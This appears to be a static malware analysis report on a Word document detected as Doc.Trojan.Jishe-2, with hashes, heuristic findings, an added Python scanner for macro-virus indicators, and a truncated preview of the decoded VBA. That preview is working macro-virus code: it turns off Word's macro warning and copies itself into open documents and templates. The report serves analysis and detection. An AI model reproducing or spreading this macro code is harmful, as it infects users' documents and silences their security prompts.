Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3fc7e4096dcb6032…

MALICIOUS

Office (OLE)

Size: 152.5 KB
Created: 2001-04-24 00:53:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b8c8fac0c4ba7ac3e00d7e9686d7e42e
SHA-1: 98e6ae789ea25bbad26ceae2ae9648fac47519c3
SHA-256: 3fc7e4096dcb603247069c1181fb7ca7e5c1339f5f0ead8176404d84406a00af
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

ClamAV identifies the file as malicious with the signature 'Doc.Trojan.Jishe-2'. It contains VBA macros, including an AutoOpen macro, the classic entry point for running code as soon as the document is opened. The macro source presents itself as a "macro virus killer" (module name JiShenhua, marker string MyMacroVirusKillerV1.0), but the behaviour visible in the extracted code is that of a macro virus regardless of the author's intent: on open it sets Options.VirusProtection = False, which silences Word's macro warning; it enumerates the VBProject of every open document and every loaded template; it reports any ThisDocument module that holds code without its marker string as "infected"; and it uses the legacy WordBasic.MacroCopy call to copy its JiShenhua and VirusReport modules into every unprotected document and template that does not already carry them (the Templates collection includes the Normal template, so the copy persists across sessions). The ClamAV detection together with this self-replication justifies the malicious verdict; the preview below is truncated, so the remainder of the 46,561-byte module is not shown here.

Heuristics 5

  • ClamAV: Doc.Trojan.Jishe-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jishe-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the generic wording "no modern VBA project was recovered" is inconsistent with the extracted artifacts: a VBA project was recovered (macros.bas), and it calls the legacy WordBasic object directly (WordBasic.[MacroFileName$](), WordBasic.MacroCopy). Treat this finding as corroborating, not independent, evidence.
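As an added example (not part of this report, its scanner, or the sample), the following stdlib-only Python scanner reproduces the kind of static check behind the findings above: it strips VBA comments, then looks for auto-exec entry points, macro-security tampering, VBA-project access and WordBasic.MacroCopy self-replication in decoded VBA source. SAMPLE is a constructed excerpt modelled on the decoded macros.bas, not the full artifact. OLE_VBA_AUTOOPEN and OLE_VBA_DOCOPEN reuse the report's finding ids; the other ids, the severities and the classify rule are assumptions made here. On a real file you would feed it olevba's decoded output instead of the embedded excerpt.

```python
"""Static triage of decoded VBA source for macro-virus indicators (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed excerpt modelled on the report's macros.bas (not the full artifact).
SAMPLE = r'''
Attribute VB_Name = "JiShenhua"
Sub AutoOpen()
    Dim file$
    file$ = WordBasic.[MacroFileName$]()
    'Turn off macro virus protection
    If Options.VirusProtection Then
        Options.VirusProtection = False
    End If
    'Note: WordBasic.MacroCopy below is the replication step
    For Each myDoc In Documents
        If (Not already) And (myDoc.VBProject.Protection = 0) Then
            WordBasic.MacroCopy file$ + ":JiShenhua", myDoc.FullName + ":JiShenhua"
            WordBasic.MacroCopy file$ + ":VirusReport", myDoc.FullName + ":VirusReport"
        End If
    Next
End Sub

Private Sub Document_Open()
    MsgBox "it's fine" ' the apostrophe inside the string is not a comment
End Sub
'''

# (finding id, severity, pattern). The first two ids are the report's own;
# the rest are hypothetical names chosen for this example.
RULES = [
    ("OLE_VBA_AUTOOPEN", "high",
     re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+AutoOpen\b", re.I | re.M)),
    ("OLE_VBA_DOCOPEN", "high",
     re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+Document_Open\b", re.I | re.M)),
    ("VBA_DISABLE_VIRUSPROTECTION", "high",
     re.compile(r"\bOptions\.VirusProtection\s*=\s*False\b", re.I)),
    ("VBA_VBPROJECT_ACCESS", "medium",
     re.compile(r"\.VBProject\b", re.I)),
    ("VBA_MACROCOPY_SELF_REPLICATION", "critical",
     re.compile(r"\bWordBasic\.MacroCopy\b", re.I)),
]
MODULE_RX = re.compile(r'^Attribute\s+VB_Name\s*=\s*"([^"]*)"', re.I | re.M)


@dataclass
class Finding:
    id: str
    severity: str
    hits: List[str]  # matched code fragments, comments already removed


def strip_comment(line: str) -> str:
    """Drop a trailing VBA comment (') while ignoring apostrophes inside "..." strings."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def module_names(src: str) -> List[str]:
    """Module names declared via Attribute VB_Name, in order of appearance."""
    return MODULE_RX.findall(src)


def scan_vba(src: str) -> Dict[str, Finding]:
    """Run every rule over comment-stripped source; keyed by finding id, RULES order."""
    code = "\n".join(strip_comment(line) for line in src.splitlines())
    found: Dict[str, Finding] = {}
    for fid, severity, rx in RULES:
        hits = [m.group(0).strip() for m in rx.finditer(code)]
        if hits:
            found[fid] = Finding(fid, severity, hits)
    return found


def classify(found: Dict[str, Finding]) -> str:
    """Auto-exec entry point plus MacroCopy is the macro-virus signature (assumed rule)."""
    autoexec = {"OLE_VBA_AUTOOPEN", "OLE_VBA_DOCOPEN"} & set(found)
    if autoexec and "VBA_MACROCOPY_SELF_REPLICATION" in found:
        return "macro-virus-like: auto-exec entry point plus self-replication"
    if any(f.severity in ("high", "critical") for f in found.values()):
        return "suspicious"
    return "no indicators"


if __name__ == "__main__":
    print("modules:", module_names(SAMPLE))
    results = scan_vba(SAMPLE)
    for f in results.values():
        print(f"{f.severity:8} {f.id}: {len(f.hits)} hit(s)")
    print(classify(results))
```

Comment stripping matters: the excerpt mentions WordBasic.MacroCopy in a comment, and the scanner still reports exactly the two real calls. Anchoring the entry-point rules to the start of a line keeps a stray "Sub AutoOpen" inside a string or comment from firing.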

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                   | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)      | 46561 bytes
SHA-256: 5d9dd15e936fb71fba4666b4d0976678fd2061cd5fa93932f459c11f20bd51ee
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JiShenhua"
'Version 1.0
'This is a macro-virus prevention and removal program I wrote while learning; it can prevent infection by some WORD macro viruses.
'It relies on a large body of macro-virus signatures; if you find a macro virus this vaccine cannot handle,
'I would be grateful if you contacted me promptly. You may also modify this program yourself to strengthen the vaccine.
'Fighting viruses is like fighting crime in society: it takes everyone's combined effort.
'You are welcome to join in and become a fighter; perhaps you are the warrior everyone has long been waiting for.
'
'Programmed by: 冀慎华 (JiShenhua)
'Office phone:
'E-mail address: club@263.net
'
Sub AutoOpen()
    Dim file$
    Dim i As Integer
    Dim already, HasVirus As Boolean   ' VBA quirk: only HasVirus is Boolean here; already is a Variant
    Dim LinesofCode As Long
    Dim answer As String
    Dim myDoc As Document
    Dim myTemp As Template
    
    answer = "MyMacroVirusKillerV1.0"   ' marker string used to recognise this program's own copies
    
    'File name of the template this macro is running from (legacy WordBasic call)
    file$ = WordBasic.[MacroFileName$]()
    
    'Turn off macro virus protection: disables Word's "document contains macros" warning
    If Options.VirusProtection Then
        Options.VirusProtection = False
    End If
    
    'Check whether any open document contains a virus
    HasVirus = False
    If (Documents.Count <> 0) Then
        For Each myDoc In Documents
            If (myDoc.VBProject.Protection = 0) Then   ' 0 = VBA project is not password-protected
                For Each xitem In myDoc.VBProject.VBComponents
                    If (xitem.Name = "ThisDocument") Then
                        'If this module contains code but the marker string is not found, treat it as a virus
                        LinesofCode = xitem.codemodule.CountOfLines
                        If (LinesofCode > 0) And (Not HasVirus) Then
                            HasVirus = Not xitem.codemodule.Find(answer, 1, 1, 1 + LinesofCode, 1)
                        End If
                    ElseIf (xitem.Name <> "JiShenhua") And (xitem.Name <> "VirusReport") Then
                        'Any other code in the document besides this program's own modules is treated as a virus
                        HasVirus = True
                    End If
                Next
            End If
        Next
    End If
    'Check whether any loaded document template contains a virus
    If Not HasVirus Then
        For Each myTemp In Templates
            If (myTemp.VBProject.Protection = 0) Then   ' 0 = VBA project is not password-protected
                For Each xitem In myTemp.VBProject.VBComponents
                    If (xitem.Name = "ThisDocument") Then
                        'If this module contains code but the marker string is not found, treat it as a virus
                        LinesofCode = xitem.codemodule.CountOfLines
                        If (LinesofCode > 0) And (Not HasVirus) Then
                            HasVirus = Not xitem.codemodule.Find(answer, 1, 1, 1 + LinesofCode, 1)
                        End If
                    ElseIf (xitem.Name <> "JiShenhua") And (xitem.Name <> "VirusReport") Then
                        'Any other code in the template besides this program's own modules is treated as a virus
                        HasVirus = True
                    End If
                Next
            End If
        Next
    End If
    If HasVirus Then 'If a virus was found, report it to the user via the VirusReport form
        Load VirusReport
        VirusReport.Show
    End If
    'Write this code into every open document
    If (Documents.Count <> 0) Then
        For Each myDoc In Documents
            'Check whether the document already carries this program's modules
            already = False
            If (myDoc.FullName = file$) Then
                already = True
            ElseIf (myDoc.VBProject.Protection = 0) Then
                For Each xitem In myDoc.VBProject.VBComponents
                    If (xitem.Name = "JiShenhua") And (xitem.Name <> "VirusReport") Then   ' second test is redundant
                        already = True
                    End If
                Next xitem
            End If
            'Self-replication: copy this template's modules into any unprotected document that lacks them
            If (Not already) And (myDoc.VBProject.Protection = 0) Then
                WordBasic.MacroCopy file$ + ":JiShenhua", myDoc.FullName + ":JiShenhua"
                WordBasic.MacroCopy file$ + ":VirusReport", myDoc.FullName + ":VirusReport"
            End If
        Next
    End If
    'Write this code into the WORD templates (the Templates collection includes the Normal template)
    For Each myTemp In Templates
            'Check whether the template already carries this program's modules
            already = False
            If (myTemp.FullName = file$) Then
                already = True
            ElseIf (myTemp.VBProject.Protection = 0) Then
                For Each xitem In myTemp.VBProject.VBComponents
                    If (xitem.Name = "JiShenhua") Then
                        already = True
                    
... (truncated)